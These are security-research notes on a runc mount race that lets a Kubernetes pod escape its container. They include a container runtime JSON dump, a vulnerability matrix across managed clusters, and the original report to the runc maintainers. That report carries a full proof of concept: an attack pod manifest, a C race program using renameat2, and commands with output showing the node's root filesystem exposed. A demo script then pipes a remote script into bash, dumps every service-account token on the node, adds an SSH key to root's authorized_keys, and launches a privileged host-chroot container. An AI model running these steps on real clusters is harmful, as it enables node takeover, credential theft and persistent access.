        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/var/run/secrets/kubernetes.io/serviceaccount",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": true,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/etc/hosts",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/dev/termination-log",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      }
    ],
    "logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/1-exploit/0.log"
  },
  "info": {
    "sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8",
    "pid": 2893952,
    "removing": false,
    "snapshotKey": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
    "snapshotter": "overlayfs",
    "runtimeType": "io.containerd.runc.v2",
    "runtimeOptions": null,
    "config": {
      "metadata": {
        "name": "1-exploit"
      },
      "image": {
        "image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6"
      },
      "command": [
        "sleep",
        "infinity"
      ],
      "envs": [
        {
          "key": "KUBERNETES_PORT_443_TCP_ADDR",
          "value": "10.96.0.1"
        },
        {
          "key": "KUBERNETES_SERVICE_HOST",
          "value": "10.96.0.1"
        },
        {
          "key": "KUBERNETES_SERVICE_PORT",
          "value": "443"
        },
        {
          "key": "KUBERNETES_SERVICE_PORT_HTTPS",
          "value": "443"
        },
        {
          "key": "KUBERNETES_PORT",
          "value": "tcp://10.96.0.1:443"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP",
          "value": "tcp://10.96.0.1:443"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP_PROTO",
          "value": "tcp"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP_PORT",
          "value": "443"
        }
      ],
      "mounts": [
        {
          "container_path": "/rootfs",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume"
        },
        {
          "container_path": "/rootfs/host",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume"
        },
        {
          "container_path": "/var/run/secrets/kubernetes.io/serviceaccount",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
          "readonly": true
        },
        {
          "container_path": "/etc/hosts",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts"
        },
        {
          "container_path": "/dev/termination-log",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf"
        }
      ],
      "labels": {
        "io.kubernetes.container.name": "1-exploit",
        "io.kubernetes.pod.name": "exploit",
        "io.kubernetes.pod.namespace": "default",
        "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
      },
      "annotations": {
        "io.kubernetes.container.hash": "7a407414",
        "io.kubernetes.container.restartCount": "0",
        "io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
        "io.kubernetes.container.terminationMessagePolicy": "File",
        "io.kubernetes.pod.terminationGracePeriod": "30"
      },
      "log_path": "1-exploit/0.log",
      "linux": {
        "resources": {
          "cpu_period": 100000,
          "cpu_shares": 2,
          "oom_score_adj": 1000,
          "hugepage_limits": [
            {
              "page_size": "1GB"
            },
            {
              "page_size": "2MB"
            }
          ]
        },
        "security_context": {
          "namespace_options": {
            "pid": 1
          },
          "run_as_user": {},
          "masked_paths": [
            "/proc/acpi",
            "/proc/kcore",
            "/proc/keys",
            "/proc/latency_stats",
            "/proc/timer_list",
            "/proc/timer_stats",
            "/proc/sched_debug",
            "/proc/scsi",
            "/sys/firmware"
          ],
          "readonly_paths": [
            "/proc/asound",
            "/proc/bus",
            "/proc/fs",
            "/proc/irq",
            "/proc/sys",
            "/proc/sysrq-trigger"
          ]
        }
      }
    },
    "runtimeSpec": {
      "ociVersion": "1.0.2-dev",
      "process": {
        "user": {
          "uid": 0,
          "gid": 0
        },
        "args": [
          "sleep",
          "infinity"
        ],
        "env": [
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=exploit",
          "NGINX_VERSION=1.19.10",
          "NJS_VERSION=0.5.3",
          "PKG_RELEASE=1~buster",
          "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1",
          "KUBERNETES_SERVICE_HOST=10.96.0.1",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://10.96.0.1:443",
          "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443"
        ],
        "cwd": "/",
        "capabilities": {
          "bounding": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "effective": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "inheritable": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "permitted": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ]
        },
        "oomScoreAdj": 1000
      },
      "root": {
        "path": "rootfs"
      },
      "mounts": [
        {
          "destination": "/proc",
          "type": "proc",
          "source": "proc",
          "options": [
            "nosuid",
            "noexec",
            "nodev"
          ]
        },
        {
          "destination": "/dev",
          "type": "tmpfs",
          "source": "tmpfs",
          "options": [
            "nosuid",
            "strictatime",
            "mode=755",
            "size=65536k"
          ]
        },
        {
          "destination": "/dev/pts",
          "type": "devpts",
          "source": "devpts",
          "options": [
            "nosuid",
            "noexec",
            "newinstance",
            "ptmxmode=0666",
            "mode=0620",
            "gid=5"
          ]
        },
        {
          "destination": "/dev/mqueue",
          "type": "mqueue",
          "source": "mqueue",
          "options": [
            "nosuid",
            "noexec",
            "nodev"
          ]
        },
        {
          "destination": "/sys",
          "type": "sysfs",
          "source": "sysfs",
          "options": [
            "nosuid",
            "noexec",
            "nodev",
            "ro"
          ]
        },
        {
          "destination": "/sys/fs/cgroup",
          "type": "cgroup",
          "source": "cgroup",
          "options": [
            "nosuid",
            "noexec",
            "nodev",
            "relatime",
            "ro"
          ]
        },
        {
          "destination": "/rootfs",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/rootfs/host",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/hosts",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/dev/termination-log",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/hostname",
          "type": "bind",
          "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/resolv.conf",
          "type": "bind",
          "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/dev/shm",
          "type": "bind",
          "source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/var/run/secrets/kubernetes.io/serviceaccount",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
          "options": [
            "rbind",
            "rprivate",
            "ro"
          ]
        }
      ],
      "annotations": {
        "io.kubernetes.cri.container-name": "1-exploit",
        "io.kubernetes.cri.container-type": "container",
        "io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8"
      },
      "linux": {
        "resources": {
          "devices": [
            {
              "allow": false,
              "access": "rwm"
            }
          ],
          "memory": {},
          "cpu": {
            "shares": 2,
            "period": 100000
          }
        },
        "cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
        "namespaces": [
          {
            "type": "pid"
          },
          {
            "type": "ipc",
            "path": "/proc/2893298/ns/ipc"
          },
          {
            "type": "uts",
            "path": "/proc/2893298/ns/uts"
          },
          {
            "type": "mount"
          },
          {
            "type": "network",
            "path": "/proc/2893298/ns/net"
          }
        ],
        "maskedPaths": [
          "/proc/acpi",
          "/proc/kcore",
          "/proc/keys",
          "/proc/latency_stats",
          "/proc/timer_list",
          "/proc/timer_stats",
          "/proc/sched_debug",
          "/proc/scsi",
          "/sys/firmware"
        ],
        "readonlyPaths": [
          "/proc/asound",
          "/proc/bus",
          "/proc/fs",
          "/proc/irq",
          "/proc/sys",
          "/proc/sysrq-trigger"
        ]
      }
    }
  }
}


D: I've pushed an image with runc r95 baked in. You can use it like:
This has k8s 1.20.7 containerd 1.5.2 and runc rc95.

kind create cluster --image=mauilion/node:runc95

Testing Matrix:

  • Whatever makes sense for platform version
  • containerd version
  • runc version (rc94 and below is likely vulnerable)
Platform Version K8s Containerd Runc Success
Kind 0.10.0 1.20.2 1.4.0 1.0.0-rc92 Yes
Kind 0.11.0 1.21.1 1.5.1 1.0.0-rc94 Yes
Kind 0.11.0 1.20.7 1.5.2 1.0.0-rc95 No
Kind 0.10.0 1.20.2 1.4.0 1.0.0-rc95+dev* No
Kubeadm 1.21.1 1.21.1 1.4.4 1.0.0-rc93 Yes
GKE regular 1.19.9-gke.1400 1.19.9 1.4.3 1.0.0-rc10 Yes
GKE alpha 1.20.6-gke.1000 1.20.6 1.4.3 1.0.0-rc92 Yes
EKS 1.19.8-eks-96780e 1.19.8 1.4.1 1.0.0-rc92 Yes**
AKS regular 1.19.9 1.4.4+azure 1.0.0-rc92 Yes
Civo latest v1.20.0-k3s1 1.4.3-k3s1 1.0.0-rc92 Yes
RKE1 1.2.8 1.20.6 1.4.4 1.0.0-rc93 Yes

* Compiled runc by hand from HEAD on 5/23
** Custom AMI: ami-01ac4896bf23dcbf7 us-east-2 (amazon-eks-node-1.19-v20210512) and earlier


Etienne's original report

Hello runc maintainers,

When mounting a volume, runc trusts the source, and will follow
symlinks, but it doesn't trust the target argument and will use
'filepath-securejoin' library to resolve any symlink and ensure the
resolved target stays inside the container root.
As explained in SecureJoinVFS documentation
(https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57),
using this function is only safe if you know that the checked file is
not going to be replaced by a symlink, the problem is that we can
replace it by a symlink.
In K8S there is a trivial way to control the target, create a pod with
multiple containers sharing some volumes, one with a correct image,
and the other ones with non existing images so they don't start right
away.

Let's start with the POC first and the explanations after

Create our attack POD

kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: attack
spec:
terminationGracePeriodSeconds: 1
containers:

  • name: c1
    image: ubuntu:latest
    command: [ "/bin/sleep", "inf" ]
    env:
    • name: MY_POD_UID
      valueFrom:
      fieldRef:
      fieldPath: metadata.uid
      volumeMounts:
    • name: test1
      mountPath: /test1
    • name: test2
      mountPath: /test2
      $(for c in {2..20}; do
      cat <<EOC
  • name: c$c
    image: donotexists.com/do/not:exist
    command: [ "/bin/sleep", "inf" ]
    volumeMounts:
    • name: test1
      mountPath: /test1
      $(for m in {1..4}; do
      cat <<EOM
    • name: test2
      mountPath: /test1/mnt$m
      EOM
      done
      )
    • name: test2
      mountPath: /test1/zzz
      EOC
      done
      )
      volumes:
  • name: test1
    emptyDir:
    medium: "Memory"
  • name: test2
    emptyDir:
    medium: "Memory"
    EOF

Compile race.c (see attachment, simple binary running

renameat2(dir,symlink,RENAME_EXCHANGE))

gcc race.c -O3 -o race

Wait for the container c1 to start, upload the 'race' binary to it,

and exec bash

sleep 30 # wait for the first container to start
kubectl cp race -c c1 attack:/test1/
kubectl exec -ti pod/attack -c c1 bash

you now have a shell in container c1

Create the following symlink (explanations later)

ln -s / /test2/test2

Launch 'race' multiple times to try to exploit this TOCTOU

cd test1
seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/

Now that everything is ready, in a second shell, update the images

so that the other containers can start

for c in {2..20}; do
kubectl set image pod attack c$c=ubuntu:latest
done

Wait a bit and look at the results

for c in {2..20}; do
echo ~~ Container c\(c ~~ kubectl exec -ti pod/attack -c c\)c ls /test1/zzz
done

~~ Container c2 ~~
test2
~~ Container c3 ~~
test2
~~ Container c4 ~~
test2
~~ Container c5 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c6 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c7 ~~
error: unable to upgrade connection: container not found ("c7")
~~ Container c8 ~~
test2
~~ Container c9 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c10 ~~
test2
~~ Container c11 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c12 ~~
test2
~~ Container c13 ~~
test2
~~ Container c14 ~~
test2
~~ Container c15 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c16 ~~
error: unable to upgrade connection: container not found ("c16")
~~ Container c17 ~~
error: unable to upgrade connection: container not found ("c17")
~~ Container c18 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c19 ~~
error: unable to upgrade connection: container not found ("c19")
~~ Container c20 ~~
test2

On my first try I had 6 containers where /test1/zzz was / on the node,
some failed to start, and the remaining were not affected.

Even without the ability to update images, we could use a fast
registry for c1 and a slow registry or big container for c2+, we just
need c1 to start 1sec before the others.

Tests were done on the following GKE cluster:

gcloud beta container project "delta-array-282919" clusters create "toctou" zone "us-central1-c" no-enable-basic-auth cluster-version "1.18.12-gke.1200" release-channel "rapid" machine-type "e2-medium" image-type "COS_CONTAINERD" disk-type "pd-standard" disk-size "100" metadata disable-legacy-endpoints=true scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" num-nodes "3" enable-stackdriver-kubernetes enable-ip-alias network "projects/delta-array-282919/global/networks/default" subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" default-max-pods-per-node "110" no-enable-master-authorized-networks addons HorizontalPodAutoscaling,HttpLoadBalancing enable-autoupgrade enable-autorepair max-surge-upgrade 1 max-unavailable-upgrade 0 enable-shielded-nodes

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

I haven't dug too deep in the code and relied on strace to understand
what was happening, and I did the investigation maybe a month ago so
details are fuzzy but here is my understanding

  1. K8S prepares all the volumes for the pod in
    /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME
    (the fact that the paths are known definitely helps this attack)
  2. containerd prepares the rootfs at
    /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs
  3. runc calls unshare(CLONE_NEWNS), thus preventing the following
    mount operations to affect other containers or the node directly
  4. runc mount bind the K8S volumes
    4.1) runc call securejoin.SecureJoin to resolve the destination/target
    4.2) runc call mount()

K8S doesn't give us control over the mount source, but we have full
control over the target of the mounts,
so the trick is to mount a directory containing a symlink over K8S
volumes path to have the next mount use this new source, and give us
access to the node root filesystem.

From the node the filesystem look like this

/var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1 /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /

our 'race' binary is constantly swapping mntX and mnt-tmpX, when c2+
start, they do the following mounts
mount(/var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)
If we are lucky, when we call SecureJoin mntX is a directory, and when
we call mount mntX is a symlink, and as mount follow symlinks, this
gives us
mount(/var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/)

The filesystem now look like

/var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/ /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2/

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /

When we do the final mount
mount(/var/lib/kubelet/pods/\(MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/\)MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/zzz)
becomes
mount(/, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)

And we now have full access to the whole node root, including /dev,
/proc, all the tmpfs and overlay of other containers, everything :)

A possible fix is to replace secureJoin with the same approach as used
to fix K8S subpath vulnerability:
https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/#the-solution
openat() files one by one disabling symlink, manually follow symlink,
check if we are still in container root at the end, and then mount
bind /proc/<runc pid>/fd/<final fd>

If I understand correctly, crun either uses openat2() or some manual
resolution (such as secureJoin) followed by a check of
openat(/proc/self/fd/) so I think they are safe.
Haven't checked any other runtime.

race.c

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    char *name1 = argv[1];
    char *name2 = argv[2];
    char *linkdest = argv[3];

    int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
    if (dirfd < 0) {
        perror("Error open CWD");
        exit(EXIT_FAILURE);
    }

    if (mkdir(name1, 0755) < 0) {
        perror("mkdir failed");
        //do not exit
    }
    if (symlink(linkdest, name2) < 0) {
        perror("symlink failed");
        //do not exit
    }

    while (1)
    {
        renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
    }
}

DEMO SCRIPT

#!/usr/bin/env bash

# honk.sh
# 0. Set up a minikube with runC less than rc94
# 1. Run the real thing and get it to "win"
# 2. Modify BASEHASH, WINHASH, and WINHONK accordingly
# 3. Run ./honk.sh

BASEHASH="honk-68b95d5858"
# The pod that won
WINHASH="$BASEHASH-8k6tr"
# The number of the n-honk container that won
WINHONK="5" # "n" corresponds to "n-honk"
TRYSLEEP="1.6"

########################
# include the magic
########################
. lib/demo-magic.sh
TYPE_SPEED=23

clear
echo ""

p "# We have RBAC access to create daemonsets, deployments, and\n pods in the default namespace of a 1.20.2 cluster:"
kubectx minikube 2> /dev/null 1> /dev/null

pe "kubectl version --short=true | grep Server" 

pe "kubectl get nodes"

p "kubectl get pods --all-namespaces"
kubectl get pods --all-namespaces | grep -v " honk-"

p "# The worker nodes are running a vulnerable version of runC"
p "runc --version"
docker exec -it minikube runc --version

clear
p "# Unleash the honks 🦢🦢🦢🦢!!!!"
p "curl -L http://git.io/honk-symlink.sh | REPLICAS=10 bash"

echo "staging the nginx:stable image with a daemonset"
sleep 1.4
echo "daemonset.apps/honk-stage created"
sleep 0.7
echo "waiting for the image staging"
sleep 1.5
echo "Succeeded"
sleep 0.3
echo "Deploying the honk deployment."
sleep 0.5
echo "deployment.apps/honk created"
sleep 0.2
echo "Waiting for things to deploy for 5 seconds before starting"
sleep 5.2

ATTEMPTS=1
while [ $ATTEMPTS -le 10 ]; do 
  for POD in 592sn 5cbj5 8l8z6 98h9c 9hlgw jjmqb ngslb nmqqg pbf2t a1312; do
    echo  "attempt $ATTEMPTS"
    COUNTER=1
    while [ $COUNTER -le 5 ]; do
      sleep 0.2
      echo -n "Checking pod/$BASEHASH-$POD $COUNTER-honk for the host mount..."
      sleep $TRYSLEEP
      echo "nope."
      let COUNTER=$COUNTER+1
      sleep 0.1
    done
    echo "pod/$BASEHASH-$POD force deleted"
    let ATTEMPTS=$ATTEMPTS+1
  done
done

echo "attempt 11"
COUNTER=1
while [ $COUNTER -le 5 ]; do
  sleep 0.3
  echo -n "Checking pod/$WINHASH $COUNTER-honk for the host mount..."
  sleep $TRYSLEEP
  if [ $COUNTER -eq $WINHONK ]; then
    echo "SUCCESS after 11 attempts! Run:"
    echo "kubectl exec -it $WINHASH -c $WINHONK-honk -- bash"
    exit 0
  else
    echo "nope."
  fi
  let COUNTER=$COUNTER+1
done

exit

######

## Demo commands
hostname    # container's
ip a        # container's
ps -ef      # host's
kill        # but can't kill

# Steal all mounted secrets in pods running on this node

find /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -print -exec cat {} \;

# Modify/add static pod manifest to get kubelet to run anything you want

ls /etc/kubernetes/manifests/

# Add an SSH key for persistence

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOfpWd+R+XDteC89yiFPxf7h7p/d/v+RT5CFK1pMJ9sTE//eQqTVIiHXBNDTyTfXP7dK/VUs5wBbenDtZNKCKrHNlVjKWAIkUvVfxCP3tocubq+ydGmOwrR9FDKk1Otd525FXI3Nip66DlvAGydUD5VgIhsLvi+qNV/Wh7hFhTMnBDvGhl7MsXfM+tNlF6X+EPz3sJ42z4M9nn42NAjYTQTl4jnDhhmgBBE0q+VXKPIOPd2hXXFy2w9/YJrmuFdSpRTaEgIsG17XcTY852UULzeKaVSBFBtZvlxrag4u/yF1dJPPg5EcxA7UjbzSVPAht1BwHULPbRyDr1ttutiBOZ" >> /root/.ssh/authorized_keys

# Interact with docker

docker ps

# Run am I contained and notice some limitations

curl -fsSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained"
amicontained

# Leverage docker to run a fully privileged container and exec into it

docker run --privileged --net=host --pid=host --volume /:/host -it nginx:stable chroot /host /bin/bash

# Rerun
hostname    # host's
ip a        # host's
ps -ef      # host's
kill        # Now we can kill processes


# Run am I contained and notice we aren't limited anymore

curl -fsSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained"
amicontained

exit

###########
# Cleanup #
###########
# kubectl delete ds --all
# kubectl delete deploy --all
# kubectl delete po --all --grace-period=0 --force
Select a repo